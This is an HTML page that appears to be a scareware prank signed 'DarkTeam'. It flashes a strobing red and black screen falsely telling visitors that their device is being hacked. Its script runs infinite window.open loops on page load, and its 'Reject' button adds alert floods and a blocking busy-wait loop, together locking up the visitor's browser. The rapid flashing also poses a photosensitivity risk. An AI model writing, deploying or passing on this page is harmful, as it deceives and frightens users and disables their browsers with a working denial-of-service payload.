<!DOCTYPE html>
<html>
 <head>
<meta charset='UTF-8'/><meta content='width=device-width, initial-scale=1, user-scalable=1, minimum-scale=1, maximum-scale=5' name='viewport'/><meta content='IE=edge' http-equiv='X-UA-Compatible'/>
  <title></title>
  <style type="text/css" media="all">
   *{
    background: black;
    margin: 0;
    padding: 0;
    box-sizing: border-box;
   }
   .hacked{
    background: black;
    width: 99vw;
    height: 98vh;
    position: fixed;
    margin: 0 auto;
    border: 2px solid red;
   }
   .hacked .img{
    width:200px;
    position: relative;
    margin: 0 auto;
    top:100px;
   }
   .hacked .img img{
    width:200px;
   }
   .hacked .img h4{
    text-align: center;
    color:red;
    font-weight: 550;
    font-size: 25px;
   }
   .hacked .img p{
    text-align: center;
    color:green;
    font-weight: 400;
   }
   .hacked .img button{
    background: red;
    border: none;
    margin-top: 20px;
    margin-left: 70px;
    border-radius: 5px;
    padding: 5px 9px;
    font-size: 17px;
   }
   @keyframes dark{
    0%{
     opacity: 0;
    }
    25%{
     opacity: 1;
    }
    50%{
     opacity: 0;
     
    }
    75%{
     
     opacity: 1;
    }
    100%{
     opacity: 0;
     
    }

   }
   .hacked{
    animation-name: dark;
    animation-duration: 0.1s;
    animation-iteration-count: 150;
   }
  </style>
 </head>
 <body>
  <div class="hacked" id="hacked">
   <div class="img">
   <img src="https://geektyper.com/mobile/warning.png" alt="DarkTeam" />
   <h4>WARNING</h4>
   <p>Your device is being hacked by DarkTeam, click the red button below to exit and stop hacking</p>
   <button type="button" onclick="next()">Reject</button>
   </div>
  </div>
  <script type="text/javascript" charset="utf-8">
   function next() {
  window.open ("contoh2.html")

function sleep(milliseconds) {
  const date = Date.now();
  let currentDate = null;
  do {
    currentDate = Date.now();
  } while (currentDate - date < milliseconds);
}
alert ("Overload!");
sleep (6000);
while(true) window.open("contoh2.html");

alert ("Overload!");
while(true) window.open("contoh2.html");
while(true) window.open("contoh2.html");
while(true) window.open("contoh2.html");
while(true) window.open("contoh2.html");
while(true) window.open("contoh2.html");
alert ("Overload!");
while(true) window.open("contoh2.html");
alert ("Overload!");
while(true) window.open("contoh2.html");
alert ("Overload!");
while(true) window.open("contoh2.html");
alert ("Overload!");
while(true) window.open("contoh2.html");
}
while(true) window.open("contoh2.html");
alert ("Overload!");
while(true) window.open("contoh2.html");
alert ("Overload!");
while(true) window.open("contoh2.html");
alert ("Overload!");
while(true) window.open("contoh2.html");
  </script>
  
 </body>
</html>